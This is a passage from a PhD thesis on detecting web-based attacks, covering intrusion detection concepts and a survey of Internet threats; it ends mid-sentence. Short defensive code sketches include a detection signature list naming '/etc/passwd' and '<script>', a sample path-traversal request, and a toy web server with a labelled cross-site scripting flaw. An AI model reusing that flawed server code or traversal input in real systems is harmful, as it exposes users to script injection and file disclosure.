
PhD in Electronic and Computer Engineering

Department of Electrical and Electronic Engineering


University of Cagliari, Italy

Detection of Web-based Attacks

Dott. Ing. Igino Corona

Advisor: Prof. Ing. Giorgio Giacinto

XXII Cycle
March 2009
Abstract
Computer Security is all about the weakest point in the information processing
chain. Nowadays, the Internet is the principal vector for information processing
and exchange, and the web-based architecture represents the de-facto standard for
accessing Internet services. Web users (browsers) and server-side web applications
are typically the weakest points in the information processing realized through the
Internet. In this thesis we present two research works, namely Flux Buster and
Web Guardian. We will show that these systems may significantly contribute to the
security of web browsers and web servers (and applications), i.e. the typical weak
points. Thus, our research works may improve computer security on the Internet.
Moreover, we will critically review the general role of intrusion detection. Intrusion
Detection Systems (IDS) must learn and operate in an adversarial, hostile
environment. As soon as an IDS is deployed, it becomes a component of the protected
system/network. This aspect is worth noting because, like any other
component, the IDS itself may be attacked. Unfortunately, this problem is really
complex and the overall picture is still unclear. Nevertheless, awareness of this
threat is a necessary condition for improving current (and future) IDS solutions. We
will critically study the ways a skilled attacker may follow to attack an IDS, in each
component of its design. Then we will review and propose possible solutions to
address these issues. We will finally give the reader a reference scheme to support
the design of adversary-aware IDS solutions.
We will highlight that the architectures of Flux Buster and Web Guardian reflect
many key points of adversary-aware IDS solutions. In particular, our general analysis
will be used to better understand the possible limitations of these systems and
identify possible ways of improvement.

Happy reading,


Igino Corona

Cagliari, March 2010


Acknowledgments
First and foremost, I would like to thank my advisor, Prof. Giorgio Giacinto, for
his precious guidance and timely advice. He is a wonderful person and a great scientist.
Thanks to Prof. Fabio Roli, the leader of our PRA group, for sharing his experience,
expertise and vision of life to improve the quality of my research. Thanks to Davide
Ariu and Roberto Perdisci, with whom I had the pleasure to work on important
projects presented in this thesis. A special thanks goes to Roberto, who helped me
during my stay in Atlanta.
Thanks to Prof. Wenke Lee for giving me the chance to work with his amazing
research group at the Georgia Institute of Technology. Thanks to all the Georgia Tech
guys (great researchers!) with whom I had the honor to share ideas about life and
research. In particular, I'd like to thank Xiapu Luo, Junjie Zhang, Kapil Singh,
Andrea Lanzi, Martim Carbone, Monirul Sharif and Abhinav Srivastava.
Special thanks to my family, my girlfriend, and her family, for their love and
support. Without them, this accomplishment would not have been possible. Thanks
to my bandmates and close friends, Mauriz, Mauretto, Andrea. Without them and
without music I would be lost.
Finally, I'd like to thank all the members of the PRA Group. I am honored to be
part of this group. It is like a big family: We few, we happy few, we band of
brothers.
Dedicated to Marylù
Contents

1 Introduction
1.1 Computer Security
1.2 Security assurance process
1.3 Intrusion Detection Systems
1.3.1 Intrusion Detection as a Pattern Recognition Task

2 Previous, Current and Future Internet Threats
2.1 Common Vulnerabilities
2.2 Know your enemy
2.3 Web security is a major concern
2.3.1 Client-side web security
2.3.2 Server-side web security
2.4 Adversarial Environment
2.5 Research contributions of this thesis

3 Protecting web users
3.1 Introduction
3.1.1 Content Delivery Networks
3.1.2 Malicious fast flux service networks
3.1.3 Detecting Fast Flux Service Networks
3.2 Flux Buster
3.2.1 Traffic Volume Reduction (F1)
3.2.2 Periodic List Pruning (F2)
3.2.3 Further Domain Filtering (F3, optional)
3.2.4 Domain Clustering
3.2.5 Service Classifier
3.3 Experiments
3.3.1 Collecting Recursive DNS Traffic
3.3.2 Clustering Candidate Flux Domains
3.3.3 Evaluation of the Service Classifier
3.4 Applications
3.4.1 Safe browsing
3.4.2 Spam Filtering
3.4.3 Limitations, possible solutions and future work

4 Protecting Web Services
4.1 Threat model
4.2 Detecting attacks against web services
4.3 HMM-Web
4.3.1 Feature extraction
4.3.2 Application-specific modules
4.3.3 Decision module
4.3.4 HMM building
4.3.5 Fusion of HMM outputs
4.3.6 Experiments
4.3.7 Results
4.4 Web Guardian
4.4.1 General learning framework
4.4.2 General models
4.4.3 Modeled Web Traffic Features
4.4.4 Architecture
4.4.5 Experiments
4.5 Limitations, proposed solutions and future work

5 Intrusion Detection and Adversarial Environment
5.1 Data Acquisition
5.1.1 Network Data Acquisition
5.1.2 Host Data Acquisition
5.1.3 Adversarial environment against HIDS: Problems
5.1.4 Adversarial environment against HIDS: Solutions
5.2 Data pre-processing
5.2.1 Adversarial environment against data pre-processing: Problems
5.2.2 Adversarial environment against data pre-processing: Solutions
5.3 Feature selection
5.3.1 Adversarial environment against Feature Selection: Problems
5.3.2 Adversarial environment against Feature Selection: Solutions
5.4 Model Selection
5.4.1 Adversarial environment against Model Selection: Problems
5.4.2 Adversarial environment against Model Selection: Solutions
5.5 Classification and result analysis
5.5.1 Problem overview
5.5.2 Misuse-based classification and result analysis
5.5.3 Anomaly-based classification and result analysis
5.5.4 Classification and result analysis: The alert verification solution
5.5.5 Classification and result analysis: solutions based on Multiple Classifier Systems
5.6 Storage box
5.7 Countermeasure box
5.8 Discussion
5.9 Conclusions and future work

6 Concluding remarks

Bibliography
Chapter 1

Introduction

Figure 1.1: The so-called pyramid of Maslow, showing the more basic human needs
at the bottom. Safety (security) is clearly one of the most important needs.
Source: Wikipedia.

The need for safety [Maslow (1943)] is widely recognized among the more basic
human needs (see Fig. 1.1). Computer security (safety) is among the basic needs of
today's Internet users and on-line organizations as well. In this thesis we present
our research work, which aims at satisfying this need. This work has been carried out
over a three-year period, and it is mainly related to two problems
of computer security: (1) the detection of security violations and (2) counteraction.
This chapter introduces the reader to some basic concepts that we
will use as a reference throughout the thesis. Here we define (a) the concept of
computer security, (b) the security assurance process, and (c) the formulation of intrusion
detection. Then, in Chapter 2 we discuss the critical aspects of today's
Internet security; in that chapter we motivate and outline our research work.

1.1 Computer Security


Computer security (or information security) may be defined as the quantitative
evaluation of several predefined properties of information. The National Institute
of Standards and Technology (NIST) [NIST FIPS199 (2004)] recognizes three key
qualities:

confidentiality: information access and disclosure are subject to authorized restrictions;
personal privacy and proprietary information are protected;

integrity: information modification or destruction is subject to authorized restrictions;
information is accepted by the destination (non-repudiation); information
originates from the declared -or expected- source (authenticity);

availability: information can be timely and reliably accessed and used.

Hence, information processing and exchange must comply with some specifications,
namely security policies. Computer security reflects the extent to which such policies
can be guaranteed by information systems.
An intrusion (i.e. attack) is the violation of one or more security policies (a security
violation), due to a security vulnerability. The term malicious activity may refer to
either an intrusion or an intrusion attempt.

1.2 Security assurance process


Information systems should process and exchange information in agreement with
security policies. To this end, a security assurance process must take place, and it
should cover the whole lifecycle of information systems. In general, the
security assurance process may be decomposed into three main mechanisms:

Prevention: prevention mechanisms aim at keeping security violations from happening,
applying suitable constraints to the design, implementation, usage and
management of information systems.

Detection: detection mechanisms aim at identifying security violations or attack
attempts. Such events are also called alerts.

Counteraction: once a security violation (or an attack attempt) is detected, a
counteraction may take place. A counteraction aims at blocking the attacker,
and possibly limiting or remediating the damage caused by the attack.

Prevention prefigures the employment of best practices for software and
hardware engineering, in agreement with security policies. Unfortunately, information
systems are becoming more and more complex. Moreover, the typical goal is
to reduce the time to market as much as possible. These two conditions explain
why the development task is inherently error-prone [Perks (2006)].

Figure 1.2: The security assurance process can be viewed as a control system

Furthermore, it is common that functional constraints and security policies are not in
agreement. So, a tradeoff between functional constraints and security policies must
be attained [Ben-Asher (2009)]. Of course, the prevention of security violations on
information systems is deeply influenced by the humans who manage and use them.
On the other hand, information systems are only (and should be considered as)
instruments of human beings [Asimov (1956)]. As pointed out by Kevin Mitnick,
one of the world's most famous hackers exploiting human vulnerabilities:

One cannot buy an expensive box and assume all problems are solved. It all
comes down to worker training and constant, diligent efforts on the part of all
workers in a company to achieve a reasonable level of information security.

Weak authentication, inadequate configuration of systems, poor assumptions
regarding users' behavior, failure to keep systems up to date, ignorance and
the tendency to trust other people are some examples of typical sources of
vulnerabilities introduced by humans [Lam et al. (2004)]. Summing up, prevention is
necessary, but it may not be sufficient to guarantee that information is actually
processed in agreement with security policies.

In Figure 1.2 we describe the security assurance process as a control
system [Raven (1995)]. Using this analogy, prevention may be viewed mainly as an
open-loop mechanism. That is, prevention is mainly a static mechanism which is
embedded in the information system itself. On the other hand, intrusion detection
allows for a dynamic analysis of information systems. Intrusion detection sensors
measure information system events in real time. The main goal of intrusion
detection is then to detect events which identify a violation of security policies (or an
attempt at one). Of course, the detection of security violations or attack attempts is
not a trivial task. From the point of view of a system administrator, attacks are
substantially unpredictable and security vulnerabilities are unknown. However, as
we will discuss in Section 1.3, intrusion detection may be approached as a pattern
recognition task. Many well-known pattern recognition techniques in the literature
may be applied to the detection of security violations. This is
the main reason why intrusion detection is currently an active research field (and
the object of this thesis).

Figure 1.3: Key IDS components, according to the Common Intrusion Detection
Framework [CIDF].

Even a perfect detection mechanism is useless without a counteraction.
Counteractions are analogous to the signals generated by a controller in a control
system (see Fig. 1.2). It is worth noting that counteractions should be
automated [Hedberg, S. (1996)] [Harmer et al. (2002)], in order to react to attacks at
computer speed. However, they typically also need the support of a human operator
(i.e. the security administrator). This is because it may be too complex to provide
fully automated counteractions, especially in highly critical environments.
Counteractions may have pros and cons that should be correctly evaluated before acting.
Counteractions may also prefigure the identification of the attacker, e.g., by means
of forensic science [Casey (2004)], or even a counterattack, as carried out by the FBI
against two Russian attackers [Lemos (2001)]. In a sense, legal proceedings against the
attacker may be considered counteractions as well.

1.3 Intrusion Detection Systems


Intrusion Detection Systems (IDS) aim at identifying security violations or attack
attempts. In response to such events, they may provide some automatic
counteraction. Furthermore, the IDS task is to allow the security administrator to
gain detailed information about malicious (or suspect) activity. This information
supports the security administrator in performing counteractions that cannot be
automated. Thus, IDSs represent a fundamental component of the security assurance
process (see Section 1.2).

Architecture According to the Common Intrusion Detection Framework (CIDF)
[CIDF] (see Fig. 1.3), the general IDS architecture is made up of four components
(a minimal sketch follows the list below):

• event box that catches and represents events occurring on the information
system in a predefined way; for example, it may catch packets flowing through
a network node and, for each packet, produce a variable (packet event)
containing all packet fields.

• analysis box that analyzes low-level events (e.g. packet events), looking for
evidence of security violations or attack attempts; for example, it may raise
an alert if current packet events match (packet events identifying)
known attacks.

• countermeasure box that performs suitable actions to protect the information
system; as an example, it may close all network connections associated
to packets that have raised one or more alarms.

• storage box that stores events, alerts and countermeasures.
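
As a minimal sketch of how the four boxes fit together, consider the following toy
pipeline (our own illustration in Python; the event format and the signature set are
invented and are not part of the CIDF specification):

    # Minimal sketch of the four CIDF boxes as a processing pipeline.
    # The event format and "signatures" below are toy inventions.

    known_bad_payloads = ("/etc/passwd", "<script>")  # toy signature set

    def event_box(raw_packet):
        # Catch an event and represent it in a predefined way.
        src, payload = raw_packet
        return {"src": src, "payload": payload}

    def analysis_box(event):
        # Look for evidence of known attacks (misuse-based analysis).
        if any(sig in event["payload"] for sig in known_bad_payloads):
            return {"event": event, "reason": "signature match"}
        return None  # no alert

    def countermeasure_box(alert):
        # Perform a suitable protective action.
        print("blocking connections from", alert["event"]["src"])

    storage_box = []  # stores events and alerts

    for packet in [("198.51.100.7", "GET /index.html"),
                   ("203.0.113.5", "GET /../../etc/passwd")]:
        event = event_box(packet)
        alert = analysis_box(event)
        storage_box.append((event, alert))
        if alert:
            countermeasure_box(alert)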

It is worth noting that most commercial IDS products are called
Intrusion Prevention Systems (e.g. [Cisco IPS] [TippingPoint IPS] [IBM ISS IPS]
[Sourcefire IPS]). This term is more appealing, but such products fit exactly in
the CIDF definition of IDS.

Classes IDSs are usually subdivided into different classes, depending either on the
input data or on the detection method:

Input data (event box)

• Network-based Input data is made up of network events, collected from
one or more network nodes. In packet-switched networks, like the Internet,
input data is made up of packets.

• Host-based Input data is made up of host events, collected from one
or more computers (i.e. hosts). Host events typically reflect the state of the
operating system kernel and/or of user applications running on the host.

Detection method (analysis box)

• Misuse-based (or signature-based) An alert is raised if current events
identify activity known to be malicious (i.e. attacks or attack attempts).
Malicious activity is usually described through a set of event patterns
(signatures).

• Anomaly-based A model of the normal (legitimate) activity is defined.
An alert is raised if current events identify anomalous activity, i.e. activity
which deviates from the model of normal activity.

Each of these classes has complementary pros and cons. This is the reason
why modern IDS solutions may fit in more than one class: they may collect both
network and host events, and employ a mixture of the two detection methods.

Thus, advanced knowledge of the pros and cons of each of the above classes is
of paramount relevance for developing any IDS solution. We will discuss this in
more detail in Chapter 5.

Properties Intrusion Detection Systems may be characterized by many different
properties, depending upon their specific task. Nevertheless, we recognize some key
properties:

accuracy: how well the IDS is able to distinguish between malicious and legitimate
activities.

learning time: the amount of time necessary to automatically build/adapt detection
models (i.e. signatures and/or models of normal activity).

throughput: the amount of events per unit of time that the IDS is able to analyze.

responsiveness: how quickly the IDS responds to attacks by performing counteractions
(or simply by signaling alerts to a human operator).

computational and memory requirements: the resources required by the IDS
during its functioning.

Accuracy may be considered the most important property of an IDS.
On the other hand, it is very difficult to evaluate, and typically only a statistical
estimation can be given. This property is usually expressed in terms of detection
rate (the fraction of detected malicious activities) and false alarm rate (the fraction of
legitimate activities erroneously classified as malicious). Detection and false alarm
rates are evaluated over a (statistically) representative test set containing events
associated to both legitimate and malicious activities.
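
As a toy numerical illustration of these two rates (the counts below are
hypothetical, not experimental results from this thesis):

    # Estimating detection rate and false alarm rate from a labeled
    # test set. All counts are hypothetical.
    n_malicious = 200        # malicious events in the test set
    n_legitimate = 9800      # legitimate events in the test set
    detected = 188           # malicious events flagged by the IDS
    false_alarms = 49        # legitimate events erroneously flagged

    detection_rate = detected / n_malicious         # 0.94
    false_alarm_rate = false_alarms / n_legitimate  # 0.005
    print(detection_rate, false_alarm_rate)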

However, the other properties are very important as well, and they may influence
the actual accuracy (and effectiveness) of the IDS. The IDS environment is
prominently time-variant: information systems are constantly evolving and new
attack instances are developed on a daily basis. Thus, the IDS models should be
updated to face this evolution and guarantee the expected accuracy over
time. In other terms, a relatively low learning time is a must. Also,
a sufficiently large throughput is necessary to be able to analyze all events
collected from information systems as soon as they are generated. Furthermore, a
very important IDS property is its responsiveness. This property may significantly
affect the quality of any counteraction. It is easy to see that counteractions should
be performed at the same speed as attacks. If this is not possible, e.g. due to a
relatively low responsiveness, counteractions may not be effective against the detected
attacks. Finally, all the previous properties depend upon the IDS implementation and
its computational and memory requirements. In general, the better such properties,
the higher these requirements. Thus, given a specific IDS hardware and software
platform, a tradeoff must always be attained.

1.3.1 Intrusion Detection as a Pattern Recognition Task


Intrusion detection can be approached as a pattern recognition task, where data
must be assigned to one of two classes: malicious and legitimate activities.
Thus, the IDS design can be subdivided into the following steps:

1. Data acquisition. This step involves the choice of the data source, and
should be designed so that captured events allow distinguishing as much as
possible between malicious and legitimate activities.

2. Data preprocessing. Acquired data is processed so that patterns that do
not belong to any of the classes of interest are deleted (noise removal), and
incomplete patterns are discarded (enhancement).

3. Feature selection. This step aims at representing patterns in a feature space
where the highest discrimination between legitimate and malicious patterns is
attained. A feature represents a measurable characteristic of the information
system's events (e.g. the number of unsuccessful logins).

4. Model selection. In this step, using a set of example patterns (training
set), a model achieving the best discrimination between legitimate and attack
patterns is selected.

5. Classification and result analysis. This step performs the intrusion detection
task, matching each test pattern with one of the classes (i.e. malicious
or legitimate activity), according to the IDS model. An alert is produced
either if the analyzed pattern matches the model of the attack class
(misuse-based IDS), or if it does not match the model of the legitimate
activity class (anomaly-based IDS). A minimal toy example of this pipeline
is sketched below.
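
The following minimal sketch (our own illustration, not one of the systems
presented in this thesis) walks the five steps for a single scalar feature, with an
anomaly-based decision rule:

    # Toy anomaly-based detector following the five steps above.
    # Feature values and the threshold are illustrative.
    import statistics

    # Steps 1-3: events acquired, preprocessed and represented by one
    # feature (e.g. number of unsuccessful logins per session).
    training = [0, 1, 0, 2, 1, 0, 0, 1, 3, 0]  # legitimate sessions only

    # Step 4: model selection - a simple statistical model of normality.
    mu = statistics.mean(training)
    sigma = statistics.stdev(training)

    def is_anomalous(x, k=3.0):
        # Step 5: alert if the pattern deviates from the normal-activity
        # model by more than k standard deviations (anomaly-based IDS).
        return abs(x - mu) > k * sigma

    for event in [1, 2, 25]:
        print(event, "ALERT" if is_anomalous(event) else "ok")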

It is easy to see that the data acquisition step is associated with the event box
of the CIDF, while all the other steps can be associated with the so-called analysis
box. The identification of the above steps is useful for the development and the
evaluation of IDSs. In particular, in Chapter 5 we will use this subdivision to study
IDSs in the context of their adversarial environment.
Chapter 2

Previous, Current and Future

Internet Threats

If you know the enemy and know yourself you need not fear
the results of a hundred battles.

Sun Tzu

In 1988, Robert T. Morris, a graduate student in Computer Science at Cornell
University (USA), implemented an experimental program called worm¹. This
program was able to replicate and propagate itself through the Internet by exploiting
bugs in the UNIX sendmail program and the finger daemon fingerd, and by
performing a password-guessing attack to execute Rsh/Rexec with user credentials
[Page (1988)]. According to the author, the main goal of the program was
to count the number of vulnerable computers connected to the Internet.
Unfortunately, as soon as the Morris Worm was injected and started to spread over
the Internet, a design flaw in the worm emerged. This flaw caused -very quickly- the
crash of thousands of computers at many sites, including universities, military sites
and medical research sites [Kehoe (1992)].
The Morris Worm is perhaps the first known relevant Internet-based threat:
it caused an accidental Denial of Service (DoS). About three years later, on
August 6, 1991, Tim Berners-Lee presented the World Wide Web (WWW, or
simply web) project by posting a short summary on the alt.hypertext
newsgroup [Berners-Lee (1991)]. This date is significant, as it identifies the beginning
of the web as a public service. Later, in 1994, an email message warning about a
computer virus named good times started to circulate among Internet users
[Jones (1998)]. This message recommended deleting any email having good times as
its subject, to avoid virus infections. Actually, this was a false alarm, since such a
virus never existed. However, the world-wide diffusion of this email message was
itself a sign of the possible impact of real email viruses. In fact, some years later
(1999), the Melissa virus -by means of email messages- infected thousands of
computers worldwide, with an estimated financial cost of millions of dollars
[Northcutt (1999)]. Since then, the Internet has represented the key instrument for
the diffusion of viruses and malicious software, i.e. malware, in general.

¹The concept of worm was introduced for the first time by researchers at the Xerox Palo Alto
Research Center. That research was aimed at supporting distributed computing, network diagnosis,
and signaling [Shoch and Hupp (1982)].

In the meantime, the widespread adoption of Common Gateway Interfaces
(whose specifications have now reached version 1.1 [CGI v.1.1 (2004)]) allowed the web
to host innovative services including e-commerce, online shopping, home banking,
search engines, webmail, and news networks. However, these innovative web services
quickly faced unexpected attacks. In 2000, Michael Calce, also known as
MafiaBoy, launched one of the most popular DoS attacks against the websites of
high-profile companies such as Yahoo!, eBay, CNN and E-Trade [Johnson (2000)]. This
caused an estimated 1.3 billion US dollars in lost business. Similarly, in 2001,
the web services of famous organizations like Microsoft, the New York Times, Bank of
America, Cingular and Citigroup were attacked by Adrian Lamo. He successfully
breached the security barriers of these companies and anonymously pointed them
at existing vulnerabilities [Poulsen, K. (2001)]. These examples, as well as all early
Internet-based threats, are useful to identify the classical attacker stereotype: an
individual who is driven by reputation, fun and the desire for knowledge. However,
this stereotype is today obsolete. Cyber attacks have become more criminal and
organized in recent years.

This chapter is dedicated to a brief inquiry into the nature of today's (and the
expected future) most significant Internet threats and vulnerabilities. This study is
organized as follows. Section 2.1 outlines the most common and critical vulnerabilities.
A brief analysis of the current most threatening attackers is made in Section 2.2.
Sections 2.3 and 2.4 are dedicated to the analysis of the web security problem and
of the adversarial environment in which security solutions must operate, respectively.
This analysis is useful to highlight our research contributions in Section 2.5.

2.1 Common Vulnerabilities


According to a recent report of the SANS Institute [SANS (2009)], the primary
infection vector on the Internet is vulnerabilities in client-side software. Such
vulnerabilities are routinely exploited by malicious websites. Browsers, and the
client-side applications that can be invoked by browsers, constitute the most targeted
software. In some cases, client software may be compromised by merely visiting
malicious websites: exploits may not require downloading and opening a document.
Furthermore, most web attacks employ social engineering techniques to attract
their victims. They may even offer rogue security tools which actually represent
malware [Lau (2009)].

Miscreants employ the infected computers for a variety of purposes. First,
compromised computers may attack other computers in the internal network (which are
normally not accessible from the Internet), or on the Internet, in order to propagate
the infection. Also, miscreants usually steal confidential data from the infected
computers and install back doors that allow them to return for further exploitation.
Such computers may become part of a botnet, in order to serve as slaves
for performing coordinated attacks against other computers [Lee et al. (2008)]. In
particular, computers in a botnet are increasingly employed to make up fast flux
service networks. These sophisticated networks usually host malicious websites,
and remediating these websites is a really hard problem (see Section 3.1.2).

On the other hand, users may be attacked by well-known, trusted websites
which have previously been infected. Often websites, and in particular web
applications, are attacked in order to inject client-side exploits. Website attacks account
for more than 60% of the total attack attempts observed on the Internet [SANS (2009)].

As evidenced by the Mitre Corporation [CVE], the percentage of web-related
vulnerabilities is still increasing over time. Furthermore, there has been a significant
increase over the past three years in the number of people discovering zero-day,
i.e. never-before-seen, vulnerabilities [SANS (2009)]. This activity is so important
that zero-day vulnerabilities, as well as programs exploiting such vulnerabilities,
are constantly bought and sold by public companies and underground
organizations [Miller (2007)].

In general, the higher the software abstraction level, the higher the related
number of vulnerabilities (see Fig. 2.1). Also, most attacks involve software
applications, because their patching is much slower than operating system
patching [SANS (2009)].

Figure 2.1: The higher the software abstraction level, the higher the number of
vulnerabilities (source: [SANS (2009)]).

2.2 Know your enemy


Nowadays, the largest Internet threat is posed by criminal organizations and
nation-states seeking economic, military and/or political advantage. Thus, a substantial
part of today's cyber attacks is due to rational, high-level behavior. Even if
new attack instances will depend on future technologies, we expect that the key goals
will remain the same in the years to come.

Wealthy underground markets are currently managed by criminal organizations.
In such markets, miscreants may sell (or buy) illicit services, such as phishing,
spam advertising, DoS attacks and exploitation tools, or confidential/strategic
data, such as credit card numbers, online banking credentials and zero-day
vulnerabilities [Franklin et al. (2007)] [Symantec (2009)] [IBM (2009)].

Criminal organizations virtually own millions of compromised computers (i.e.
botnets) world-wide and employ them to their advantage. For example, such a high
number of hosts may potentially perform a (distributed) DoS against any Internet
service [Mills (2009)]. Botnets may be employed to send billions of spam emails
per day [Ng (2009)]. A portion of a botnet may be used to build fast flux service
networks aimed at stealing confidential information, installing malware and
supporting phishing (see Section 3.1.2). Computers in a botnet are very difficult to
remediate, due to their high number, different physical owners and diverse geolocation.
These machines are often scattered across many nations, and remediating
them would also require a coordinated international response effort.

In recent years, much evidence of nation-state involvement in cyber attacks
has been collected. The Internet may be used as a tool of war, and the related threats
are now a matter of national security. For example, in 2005, sophisticated attacks
against computer networks of the US government were strongly linked to
military hackers in China [FP (2005)]. Estonia accused Russia of involvement in
attacks against Estonian government, newspaper and banking websites. These
attacks started from the decision of Estonia to move the Bronze Soldier, a Soviet World
War II memorial [Bright (2007)]. Nation-states may also target well-known
companies. Google said that the accounts of people (around the world) who advocate
for human rights in China are routinely accessed by third parties. According to
security experts from iDefense Labs, these attacks are probably supported by the
Chinese government [Shiels, M. (2010)].

2.3 Web security is a major concern


Figure 2.2 shows the main components of a modern web-based architecture. Such an
architecture follows the client-server paradigm, and data is exchanged according to
either the HTTP [RFC 2616 (1999)] or the HTTPS protocol [RFC 2818 (2000)]. The web
browser (client) sends a request message, and the web server replies with a message
containing the requested informative content. All modern web services are based
on the so-called Common Gateway Interfaces (CGI). According to the CGI scheme,
informative content is generated in real time by a web application. Web applications
are software programs which, depending on their input, may return some type of
informative content (e.g. an HTML page, a video or an audio stream). Web application
inputs are extracted by the web server from the request message. This architecture
is robust, flexible and allows easy sharing of information content among Internet
users. This explains its wide deployment, but also why it is currently the main
target of cyber-criminals.

Figure 2.2: The web-based architecture. (1) A request message is sent by the web
client (i.e. browser) to the server. (2) The web server interprets the message to select
a web application and its inputs. (3) Inputs are submitted to the web application.
(4) Depending on its inputs, the web application outputs some informative content.
(5) The web server replies with a response message to the web client; this message
contains the web application's output.
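
To make the flow of Figure 2.2 concrete, the following self-contained sketch uses
only Python's standard library (it is our own illustration, not code from the thesis;
web_application is a hypothetical name for a generic server-side program):

    # Toy web server following steps (2)-(5) of Figure 2.2.
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.parse import urlparse, parse_qs

    def web_application(inputs):
        # (4) Depending on its inputs, produce some informative content.
        # NOTE: echoing unsanitized input like this is exactly the kind
        # of flaw (XSS) discussed later in this chapter.
        name = inputs.get("name", ["world"])[0]
        return "<html><body>Hello, %s!</body></html>" % name

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            # (2)-(3) Interpret the request and extract the inputs.
            inputs = parse_qs(urlparse(self.path).query)
            body = web_application(inputs).encode()
            # (5) Reply with a response carrying the application output.
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(body)

    if __name__ == "__main__":
        HTTPServer(("localhost", 8080), Handler).serve_forever()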

A recent report from the Cenzic corporation shows that about 78% of the total
Internet-based threats are related to web-based vulnerabilities [Cenzic (2009)]. The
current trend highlights that this situation is going to get worse, since web
vulnerabilities are significantly increasing over time. Thus, this is a current problem, but
it is also expected to be a relevant problem in the years to come.

According to the definition of the web-based architecture, we may subdivide the
web security problem into two main subproblems: client-side and server-side web
security. In order to better understand the contribution of this thesis, in the following
we discuss these two issues in more detail.

2.3.1 Client-side web security


A key problem of client-side web security is represented by the time gap between
the disclosure of an application flaw and the deployment of a suitable countermeasure.
Once a program exploiting a software flaw has been released into the wild, users
of the affected software will continue to be compromised until a suitable
counteraction is taken. The typical countermeasure is the patching of client-side
applications, i.e. correcting these applications in order to remove the vulnerability.
Generally, the software developer builds a patch; then it is up to the user
(administrator) of the affected software to download and install the patch (or to allow
the automatic software update). Unfortunately, the patch development process may
take a relatively long time. Some vulnerabilities may wait years before getting a
patch [SANS (2009)].

Moreover, client-side web security is widely affected by the so-called browser
plug-ins, i.e. programs that can be invoked by the browser. These programs may
handle, interpret and/or display multimedia content which is not handled natively by
the web browser. Some examples of popular (and, today, most targeted) browser
plug-ins are Adobe Flash Player, Adobe Reader, Sun Java, and the Microsoft Office
suite (Excel, Powerpoint, Word). A malicious (or infected) website may easily
compromise millions of computers world-wide by exploiting a bug in one of these
applications. Figure 2.3 shows the distribution of vulnerabilities in client-side
software, reflecting the top 30 vulnerabilities exploited in client-side
software [SANS (2009)]. Remote code execution vulnerabilities are among the most
exploited by malicious websites.

Figure 2.3: Top vulnerabilities exploited in client-side software. Categories shown
in the chart: Remote Code Execution (50.0%), Buffer Overflow (25.0%), Elevation
of Privileges (9.4%), Multiple Vulnerabilities and Other (the remaining 9.4% and
6.2%).



2.3.2 Server-side web security


Server-side web security is widely affected by vulnerabilities in web servers and,
in particular, web applications. Web applications are becoming ever more complex,
and considering all possible exceptions to the expected behavior is really hard.
Moreover, website developers (and administrators) demonstrate a lack of awareness
and of the security training needed to cope with attacks targeting the most common flaws.

Web applications represent an interesting target for two main reasons. First
and foremost, web applications may handle confidential data, such as users'
account credentials, users' personal information or confidential documents. Moreover,
a vulnerability may be exploited to perform unauthorized actions, such as
unauthorized money transfers on a home banking website, or to stealthily attack other
computers, e.g. using the website as a proxy. Secondly, the web application may be
compromised to return malicious code (e.g. Javascript code) and attack users that
subsequently connect to the website. The latter type of attack is currently the most
widespread [SANS (2009)].

The Web Application Security Consortium recently published a relevant report
on Web Application Security Statistics [WASC (2010)]. The report is related to
data collected in 2008 and analyzed more than 12,000 web applications, identifying
about 100,000 vulnerabilities. About 96% of the web applications under study
contained high-risk vulnerabilities, and more than 13% of all websites were found
to be exploitable completely automatically. Moreover, 99% of web applications were
found not compliant with the PCI Data Security Standard, a set of requirements and
best practices for enhancing the security of payment account data, defined by the
PCI Security Standards Council [PCI].

These results, in addition to the public availability (i.e. exposure) of web
services, clearly highlight the relevance of the problem. Figure 2.4 shows the top web
application vulnerabilities according to that study [WASC (2010)]. Cross-Site
Scripting (XSS), information leakage and SQL injection flaws are the most widespread. In
particular, according to the Open Web Application Security Project [OWASP (2010)],
injection flaws such as XSS and SQL injection represent the top security risks.

Server-side attacks may target popular websites, and in particular websites
employing open-source Content Management Systems (CMS). There is a good reason
for this: CMSs are widely diffused, and they may be easy to attack, since
their source code is publicly available and thus it may be easier to find security bugs
through white-box analysis (i.e. code inspection).

2.4 Adversarial Environment


Computer security is a research field that must coexist with the presence of an
adversary. The adversary is motivated to break security policies and evade security
mechanisms, (possibly) with minimum effort. Thus, every security solution should
be designed to cope with an adversarial environment. This aspect is currently
receiving more attention from security researchers, since attack tools are becoming
ever more sophisticated and easier to use, and security tools ever less effective.

Figure 2.4: Top web application vulnerabilities (source: [WASC (2010)]).
As an example, a new generation of malware, the so-called malware 2.0, has
recently started to thrive [Porras (2009)]. Malware 2.0 may employ sophisticated
techniques such as code metamorphism, cryptography and virtualization in order to evade
detection [Ollmann (2009)]. Advanced malware production programs are available
in the wild. These programs automate the malware production process, providing a
wide range of options to defeat current detection methods. They may even provide
hack-back routines designed to identify whether the malware is operating within
a virtual environment. In this case, the malware may change its behavior and try to
compromise the virtual machine. The automated production of malware may also
employ techniques similar to the copyright protection used for games and media
digital rights management (DRM). These methods may significantly enhance
robustness and stealthiness against automated detection systems and even against the
reverse engineering performed by threat analysts. Finally, miscreants dedicate a
significant effort to quality assurance practices for new malware. New malware is
validated, and only then deployed, after an extensive evaluation using current
anti-virus products and specialized on-line detectors (e.g. www.virustotal.com)
[Ollmann (2009)].
Similarly, a wide range of evasion techniques is employed by the most popular
web application attacks, such as cross-site scripting [Hansen (2009)] and SQL
injection [Mac Vittie (2007)]. Web application input validation routines may be easily
evaded by combining one or more of these evasion methods.

This situation suggests (and we believe) that the design of future security tools
must necessarily embed an awareness of the adversarial environment, in order to cope
with current and future threats. We dedicate Chapter 5 to the study of this problem
with regard to Intrusion Detection Systems.

2.5 Research contributions of this thesis


In Section 2.3.1 we showed that the primary source of infection of Internet users
is the world-wide web. Web browsers and their plug-ins may be compromised, and
users may be fooled, by malicious websites. Thus, a possible way to address this
problem is to recognize malicious (or suspect) websites, and then deny their loading
by default. To some extent, a similar approach is already implemented in popular
web browsers like Mozilla Firefox and Google Chrome, which leverage the so-called
Google Safe Browsing API. This is an experimental web service through
which client applications may check website URLs against a blacklist of malicious
websites. Google regularly updates this blacklist, in order to quickly signal new
malicious websites and the related domain names. There is good reason to trust
Google: among other things, it is the world's most important search engine, with a
great deal of information and computational power to identify malicious websites.

On the other hand, malicious websites are increasingly hosted by means of fast
flux service networks. In this way, cyber criminals may provide a reliable
(malicious) service which is inherently difficult to switch off. The first research
